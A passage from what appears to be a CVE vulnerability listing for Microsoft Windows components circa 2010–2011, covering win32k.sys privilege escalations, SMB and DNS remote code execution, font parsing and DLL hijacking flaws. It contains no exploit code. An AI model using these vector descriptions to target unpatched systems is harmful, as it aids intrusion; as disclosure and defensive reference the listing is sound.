management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1239] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1238] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1237] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1236] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1235] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1234] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1233] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1232] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1231] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1230] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1229] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1228] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1227] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1226] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1225] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1068] Microsoft Windows Azure Software Development Kit (SDK) 1.3.x before 1.3.20121.1237, when Full IIS and a Web Role are used with an ASP.NET application, does not properly support the use of cookies for maintaining state, which allows remote attackers to obtain potentially sensitive information by reading an encrypted cookie and performing unspecified other steps. [CVE-2011-0677] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-0676] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-0675] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0674] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0673] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP3 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-0672] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0671] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0670] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0667] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0666] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0665] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0662] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0661] The SMB Server service in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate fields in SMB requests, which allows remote attackers to execute arbitrary code via a malformed request in a (1) SMBv1 or (2) SMBv2 packet, aka "SMB Transaction Parsing Vulnerability." [CVE-2011-0660] The SMB client in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote SMB servers to execute arbitrary code via a crafted (1) SMBv1 or (2) SMBv2 response, aka "SMB Client Response Parsing Vulnerability." [CVE-2011-0658] Integer underflow in the OLE Automation protocol implementation in VBScript.dll in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted WMF file, aka "OLE Automation Underflow Vulnerability." [CVE-2011-0657] DNSAPI.dll in the DNS client in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly process DNS queries, which allows remote attackers to execute arbitrary code via (1) a crafted LLMNR broadcast query or (2) a crafted application, aka "DNS Query Vulnerability." [CVE-2011-0654] Integer underflow in the BowserWriteErrorLogEntry function in the Common Internet File System (CIFS) browser service in Mrxsmb.sys or bowser.sys in Active Directory in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code or cause a denial of service (system crash) via a malformed BROWSER ELECTION message, leading to a heap-based buffer overflow, aka "Browser Pool Corruption Vulnerability." NOTE: some of these details are obtained from third party information. [CVE-2011-0638] Microsoft Windows does not properly warn the user before enabling additional Human Interface Device (HID) functionality over USB, which allows user-assisted attackers to execute arbitrary programs via crafted USB data, as demonstrated by keyboard and mouse data sent by malware on a smartphone that the user connected to the computer. [CVE-2011-0627] Adobe Flash Player before 10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted Flash content, as possibly exploited in the wild in May 2011 by a Microsoft Office document with an embedded .swf file. [CVE-2011-0347] Microsoft Internet Explorer on Windows XP allows remote attackers to trigger an incorrect GUI display and have unspecified other impact via vectors related to the DOM implementation, as demonstrated by cross_fuzz. [CVE-2011-0096] The MHTML protocol handler in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle a MIME format in a request for content blocks in a document, which allows remote attackers to conduct cross-site scripting (XSS) attacks via a crafted web site that is visited in Internet Explorer, aka "MHTML Mime-Formatted Request Vulnerability." [CVE-2011-0091] Kerberos in Microsoft Windows Server 2008 R2 and Windows 7 does not prevent a session from changing from strong encryption to DES encryption, which allows man-in-the-middle attackers to spoof network traffic and obtain sensitive information via a DES downgrade, aka "Kerberos Spoofing Vulnerability." [CVE-2011-0090] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Memory Corruption Vulnerability." [CVE-2011-0089] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Window Class Improper Pointer Validation Vulnerability." [CVE-2011-0088] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Window Class Pointer Confusion Vulnerability." [CVE-2011-0087] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, and Server 2008 Gold and SP2 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Insufficient User Input Validation Vulnerability." [CVE-2011-0086] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Improper User Input Validation Vulnerability." [CVE-2011-0045] The Trace Events functionality in the kernel in Microsoft Windows XP SP3 does not properly perform type conversion, which causes integer truncation and insufficient memory allocation and triggers a buffer overflow, which allows local users to gain privileges via a crafted application, related to WmiTraceMessageVa, aka "Windows Kernel Integer Truncation Vulnerability." [CVE-2011-0043] Kerberos in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 supports weak hashing algorithms, which allows local users to gain privileges by operating a service that sends crafted service tickets, as demonstrated by the CRC32 algorithm, aka "Kerberos Unkeyed Checksum Vulnerability." [CVE-2011-0042] SBE.dll in the Stream Buffer Engine in Windows Media Player and Windows Media Center in Microsoft Windows XP SP2 and SP3, Windows XP Media Center Edition 2005 SP3, Windows Vista SP1 and SP2, Windows 7 Gold and SP1, and Windows Media Center TV Pack for Windows Vista does not properly parse Digital Video Recording (.dvr-ms) files, which allows remote attackers to execute arbitrary code via a crafted file, aka "DVR-MS Vulnerability." [CVE-2011-0041] Integer overflow in gdiplus.dll in GDI+ in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold and SP2, and Office XP SP3 allows remote attackers to execute arbitrary code via a crafted EMF image, aka "GDI+ Integer Overflow Vulnerability." [CVE-2011-0040] The server in Microsoft Active Directory on Windows Server 2003 SP2 does not properly handle an update request for a service principal name (SPN), which allows remote attackers to cause a denial of service (authentication downgrade or outage) via a crafted request that triggers name collisions, aka "Active Directory SPN Validation Vulnerability." [CVE-2011-0039] The Local Security Authority Subsystem Service (LSASS) in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly process authentication requests, which allows local users to gain privileges via a request with a crafted length, aka "LSASS Length Validation Vulnerability." [CVE-2011-0037] Microsoft Malware Protection Engine before 1.1.6603.0, as used in Microsoft Malicious Software Removal Tool (MSRT), Windows Defender, Security Essentials, Forefront Client Security, Forefront Endpoint Protection 2010, and Windows Live OneCare, allows local users to gain privileges via a crafted value of an unspecified user registry key. [CVE-2011-0034] Stack-based buffer overflow in the OpenType Compact Font Format (aka OTF or CFF) driver in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via crafted parameter values in an OpenType font, aka "OpenType Font Stack Overflow Vulnerability." [CVE-2011-0033] The OpenType Compact Font Format (CFF) driver in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate parameter values in OpenType fonts, which allows remote attackers to execute arbitrary code via a crafted font, aka "OpenType Font Encoded Character Vulnerability." [CVE-2011-0032] Untrusted search path vulnerability in DirectShow in Microsoft Windows Vista SP1 and SP2, Windows 7 Gold and SP1, Windows Server 2008 R2 and R2 SP1, and Windows Media Center TV Pack for Windows Vista allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a Digital Video Recording (.dvr-ms), Windows Recorded TV Show (.wtv), or .mpg file, aka "DirectShow Insecure Library Loading Vulnerability." [CVE-2011-0031] The (1) JScript 5.8 and (2) VBScript 5.8 scripting engines in Microsoft Windows Server 2008 R2 and Windows 7 do not properly load decoded scripts obtained from web pages, which allows remote attackers to trigger memory corruption and consequently obtain sensitive information via a crafted web site, aka "Scripting Engines Information Disclosure Vulnerability." [CVE-2011-0030] The Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly kill processes after a logout, which allows local users to obtain sensitive information or gain privileges via a crafted application that continues to execute throughout the logout of one user and the login session of the next user, aka "CSRSS Elevation of Privilege Vulnerability," a different vulnerability than CVE-2010-0023. [CVE-2011-0028] WordPad in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly parse fields in Word documents, which allows remote attackers to execute arbitrary code via a crafted .doc file, aka "WordPad Converter Parsing Vulnerability." [CVE-2011-0027] Microsoft Data Access Components (MDAC) 2.8 SP1 and SP2, and Windows Data Access Components (WDAC) 6.0, does not properly validate memory allocation for internal data structures, which allows remote attackers to execute arbitrary code, possibly via a large CacheSize property that triggers an integer wrap and a buffer overflow, aka "ADO Record Memory Vulnerability." NOTE: this might be a duplicate of CVE-2010-1117 or CVE-2010-1118. [CVE-2011-0026] Integer signedness error in the SQLConnectW function in an ODBC API (odbc32.dll) in Microsoft Data Access Components (MDAC) 2.8 SP1 and SP2, and Windows Data Access Components (WDAC) 6.0, allows remote attackers to execute arbitrary code via a long string in the Data Source Name (DSN) and a crafted szDSN argument, which bypasses a signed comparison and leads to a buffer overflow, aka "DSN Overflow Vulnerability." [CVE-2010-5082] Untrusted search path vulnerability in colorcpl.exe 6.0.6000.16386 in the Color Control Panel in Microsoft Windows Server 2008 SP2, R2, and R2 SP1 allows local users to gain privileges via a Trojan horse sti.dll file in the current working directory, as demonstrated by a directory that contains a .camp, .cdmp, .gmmp, .icc, or .icm file, aka "Color Control Panel Insecure Library Loading Vulnerability." [CVE-2010-4701] Heap-based buffer overflow in the CDrawPoly::Serialize function in fxscover.exe in Microsoft Windows Fax Services Cover Page Editor 5.2 r2 in Windows XP Professional SP3, Server 2003 R2 Enterprise Edition SP2, and Windows 7 Professional allows remote attackers to execute arbitrary code via a long record in a Fax Cover Page (.cov) file. NOTE: some of these details are obtained from third party information. [CVE-2010-4669] The Neighbor Discovery (ND) protocol implementation in the IPv6 stack in Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, and Windows 7 allows remote attackers to cause a denial of service (CPU consumption and system hang) by sending many Router Advertisement (RA) messages with different source addresses, as demonstrated by the flood_router6 program in the thc-ipv6 package. [CVE-2010-4562] Microsoft Windows 2008, 7, Vista, 2003, 2000, and XP, when using IPv6, allows remote attackers to determine whether a host is sniffing the network by sending an ICMPv6 Echo Request to a multicast address and determining whether an Echo Reply is sent, as demonstrated by thcping. NOTE: due to a typo, some sources map CVE-2010-4562 to a ProFTPd mod_sql vulnerability, but that issue is covered by CVE-2010-4652. [CVE-2010-4398] Stack-based buffer overflow in the RtlQueryRegistryValues function in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges, and bypass the User Account Control (UAC) feature, via a crafted REG_BINARY value for a SystemDefaultEUDCFont registry key, aka "Driver Improper Interaction with Windows Kernel Vulnerability." [CVE-2010-4182] Untrusted search path vulnerability in the Data Access Objects (DAO) library (dao360.dll) in Microsoft Windows XP Professional SP3, Windows Server 2003 R2 Enterprise Edition SP3, Windows Vista Business SP1, and Windows 7 Professional allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse msjet49.dll that is located in the same folder as a file that is processed by dao360.dll. NOTE: the provenance of this information is unknown [CVE-2010-3974] fxscover.exe in the Fax Cover Page Editor in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly parse FAX cover pages, which allows remote attackers to execute arbitrary code via a crafted .cov file, aka "Fax Cover Page Editor Memory Corruption Vulnerability." [CVE-2010-3973] The WMITools ActiveX control in WBEMSingleView.ocx 1.50.1131.0 in Microsoft WMI Administrative Tools 1.1 and earlier in Microsoft Windows XP SP2 and SP3 allows remote attackers to execute arbitrary code via a crafted argument to the AddContextRef method, possibly an untrusted pointer dereference, aka "Microsoft WMITools ActiveX Control Vulnerability." [CVE-2010-3970] Stack-based buffer overflow in the CreateSizedDIBSECTION function in shimgvw.dll in the Windows Shell graphics processor (aka graphics rendering engine) in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a crafted .MIC or unspecified Office document containing a thumbnail bitmap with a negative biClrUsed value, as reported by Moti and Xu Hao, aka "Windows Shell Graphics Processing Overrun Vulnerability." [CVE-2010-3967] Untrusted search path vulnerability in Microsoft Windows Movie Maker (WMM) 2.6 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a Movie Maker (MSWMM) file, aka "Insecure Library Loading Vulnerability." [CVE-2010-3966] Untrusted search path vulnerability in Microsoft Windows Server 2008 R2 and Windows 7, when BranchCache is supported, allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains an EML file, an RSS file, or a WPOST file, aka "BranchCache Insecure Library Loading Vulnerability." [CVE-2010-3965] Untrusted search path vulnerability in Windows Media Encoder 9 on Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, and Windows Server 2008 Gold and SP2 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a Windows Media Profile (PRX) file, aka "Insecure Library Loading Vulnerability." [CVE-2010-3963] Buffer overflow in the Routing and Remote Access NDProxy component in the kernel in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a crafted application, related to the Routing and Remote Access service (RRAS) and improper copying from user mode to the kernel, aka "Kernel NDProxy Buffer Overflow Vulnerability." [CVE-2010-3961] The Consent User Interface (UI) in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly handle an unspecified registry-key value, which allows local users with SeImpersonatePrivilege rights to gain privileges via a crafted application, aka "Consent UI Impersonation Vulnerability." [CVE-2010-3960] Hyper-V in Microsoft Windows Server 2008 Gold, SP2, and R2 allows guest OS users to cause a denial of service (host OS hang) by sending a crafted encapsulated packet over the VMBus, aka "Hyper-V VMBus Vulnerability." [CVE-2010-3959] The OpenType Font (OTF) driver in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges via a crafted CMAP table in an OpenType font, aka "OpenType CMAP Table Vulnerability." [CVE-2010-3957] Double free vulnerability in the OpenType Font (OTF) driver in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges via a crafted OpenType font, aka "OpenType Font Double Free Vulnerability." [CVE-2010-3956] The OpenType Font (OTF) driver in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly perform array indexing, which allows local users to gain privileges via a crafted OpenType font, aka "OpenType Font Index Vulnerability." [CVE-2010-3944] win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2008 R2 and Windows 7 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Memory Corruption Vulnerability." [CVE-2010-3943] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly link driver objects, which allows local users to gain privileges via a crafted application that triggers linked-list corruption, aka "Win32k Cursor Linking Vulnerability." [CVE-2010-3942] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly allocate memory for copies from user mode, which allows local users to gain privileges via a crafted application, aka "Win32k WriteAV Vulnerability." [CVE-2010-3941] Double free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold and SP2, and Windows 7 allows local users to gain privileges via a crafted application, aka "Win32k Double Free Vulnerability." [CVE-2010-3940] Double free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges via a crafted application, aka "Win32k PFE Pointer Double Free Vulnerability." [CVE-2010-3939] Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges via vectors related to improper memory allocation for copies from user mode, aka "Win32k Buffer Overflow Vulnerability." [CVE-2010-3889] Unspecified vulnerability in Microsoft Windows on 32-bit platforms allows local users to gain privileges via unknown vectors, as exploited in the wild in July 2010 by the Stuxnet worm, and identified by Microsoft researchers and other researchers. [CVE-2010-3888] Unspecified vulnerability in Microsoft Windows on 32-bit platforms allows local users to gain privileges via unknown vectors, as exploited in the wild in July 2010 by the Stuxnet worm, and identified by Kaspersky Lab researchers and other researchers. [CVE-2010-3338] The Windows Task Scheduler in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly determine the security context of scheduled tasks, which allows local users to gain privileges via a crafted application, aka "Task Scheduler Vulnerability." NOTE: this might overlap CVE-2010-3888. [CVE-2010-3324] The toStaticHTML function in Microsoft Internet Explorer 8, and the SafeHTML function in Microsoft Windows SharePoint Services 3.0 SP2, SharePoint Foundation 2010, Office SharePoint Server 2007 SP2, Groove Server 2010, and Office Web Apps, allows remote attackers to bypass the cross-site scripting (XSS) protection mechanism and conduct XSS attacks via a crafted use of the Cascading Style Sheets (CSS) @import rule, aka "HTML Sanitization 